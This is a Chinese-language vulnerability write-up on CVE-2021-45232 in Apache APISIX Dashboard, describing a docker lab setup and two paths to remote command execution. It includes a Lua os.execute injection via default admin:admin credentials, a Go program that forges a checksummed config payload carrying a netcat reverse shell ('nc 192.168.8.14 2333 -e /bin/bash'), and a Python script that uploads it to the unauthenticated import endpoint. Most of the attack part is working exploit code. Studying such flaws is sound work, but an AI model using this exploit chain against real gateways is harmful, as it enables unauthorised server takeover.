當前位置：首頁 > server > anz > 詳細頁面

Apache APISIX Dashboard 未授權訪問漏洞分析(CVE-2021-45232)

時間：2023-03-17來源：系統城裝機大師作者：佚名

漏洞描述

Apache APISIX 是一個動態、實時、高性能的 API 網關，提供負載均衡、動態上游、灰度發布、服務熔斷、身份認證、可觀測性等豐富的流量管理功能。Apache APISIX Dashboard 使用戶可通過前端界面操作 Apache APISIX。該漏洞的存在是由于 Manager API 中的錯誤。Manager API 在 gin 框架的基礎上引入了 droplet 框架，所有的 API 和鑒權中間件都是基于 droplet 框架開發的。但是有些 API 直接使用了框架 gin 的接口，從而繞過身份驗證。

影響范圍

Apache APISIX Dashboard < 2.10.1

環境部署

通過git clone apisix-docker

1 2	`git clone https://github.com/apache/apisix-docker` `cd` `apisix-docker/example/`

修改docker-compose.yml

1 2	`apache/apisix-dashboard:2.7` `apache/apisix:2.6-alpine`

然后，docker-compose up -d 啟動環境

環境起來后，瀏覽器通過默認端口9000訪問apisix dashboard

后臺RCE

由于apisix dashboard 默認賬號和密碼是admin:admin，所以我們先登錄到后臺，來驗證一把遠程命令執行

首先創建一個上游服務，點擊創建，名稱隨意命名，目標節點填寫我們轉發請求的服務，這里我們填寫docker附帶的Grafana應用，端口號為3000，點擊下一步，提交即可。

其次，創建一個路由，名稱任意起，路徑也是自定義，點擊下一步，選擇我們剛才創建的上游服務，最后，提交即可。

查看創建的路由

回到路由配置頁面，點擊配置，然后一直下一步，直到提交時，使用BurpSuite抓包

然后在請求包的body中，添加一個script字段后，發送請求。

1	`"script":` `"os.execute('touch /tmp/Keepb1ue')"`

再次查看，路由配置信息

接著，我們訪問一下: http://192.168.10.171:9080/rce111

docker中看一下，是否創建了Keepblue這個文件

未授權接口RCE

如果沒有默認密碼或者弱密碼的話，這時我們就利用未授權接口進行RCE了

1 2	`/apisix/admin/migrate/export` `/apisix/admin/migrate/import`

首先，使用/apisix/admin/migrate/export導出配置文件

因為是未授權，所以在未登陸情況下，BP抓包后，請求接口改為/apisix/admin/migrate/export，點擊send后，看到配置文件信息

在導入配置文件時，會對配置文件的checksum值進行校驗，那這里其實是可以通過寫腳本算出checksum校驗值，或者是根據apisix的源碼去計算出新的checksum值

源碼位置在：apisix-dashboard-master\api\internal\handler\migrate\migrate.go的ExportConfig函數將其計算源碼單獨抽取出來，并將需要導入的配置（data）進修替換和插入RCE語句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37 package main

import (
"encoding/binary"
"fmt"
"hash/crc32"
"io/ioutil"
"os"
)
func main() {
gen()
}
func gen() {
data := []byte(`{"Counsumers":[],"Routes":[{"id":"403141558204891851","create_time":1649820693,"update_time":1649821490,"uris":["/rce111"],"name":"lyroute","methods":["GET","POST","PUT","DELETE","PATCH","HEAD","OPTIONS","CONNECT","TRACE"],"script":"os.execute('nc 192.168.8.14 2333 -e /bin/bash')","script_id":"403141558204891851","upstream_id":"403140847589130955","status":1}],"Services":[],"SSLs":[],"Upstreams":[{"id":"403140847589130955","create_time":1649820270,"update_time":1649820270,"nodes":[{"host":"192.168.10.171","port":3000,"weight":1}],"timeout":{"connect":6,"read":6,"send":6},"type":"roundrobin","scheme":"http","pass_host":"pass","name":"lytest"}],"Scripts":[{"id":"403141558204891851","script":"os.execute('nc 192.168.8.14 2333 -e /bin/bash')"}],"GlobalPlugins":[],"PluginConfigs":[]}`)
checksumUint32 := crc32.ChecksumIEEE(data)
checksumLength := 4
checksum := make([]byte, checksumLength)
binary.BigEndian.PutUint32(checksum, checksumUint32)
fileBytes := append(data, checksum...)

content := fileBytes
fmt.Println(content)

importData := content[:len(content)-4]
checksum2 := binary.BigEndian.Uint32(content[len(content)-4:])
if checksum2 != crc32.ChecksumIEEE(importData) {
fmt.Println(checksum2)
fmt.Println(crc32.ChecksumIEEE(importData))
fmt.Println("Check sum check fail, maybe file broken")
return
}
err := ioutil.WriteFile("apisixPayload", content, os.ModePerm)
if err != nil {
fmt.Println("error!!")
return
}
}

運行這段腳本，會生成apisixPayload這個文件

這個就是我們要import上去的計算好校驗值的新的配置文件，接下來使用python代碼可以簡單的傳到服務端

1
2
3
4
5
6 import requests
url = "http://192.168.10.171:9000/apisix/admin/migrate/import"
files = {"file": open("apisixPayload", "rb")}
r = requests.post(url, data={"mode": "overwrite"}, files=files)
print(r.status_code)
print(r.content)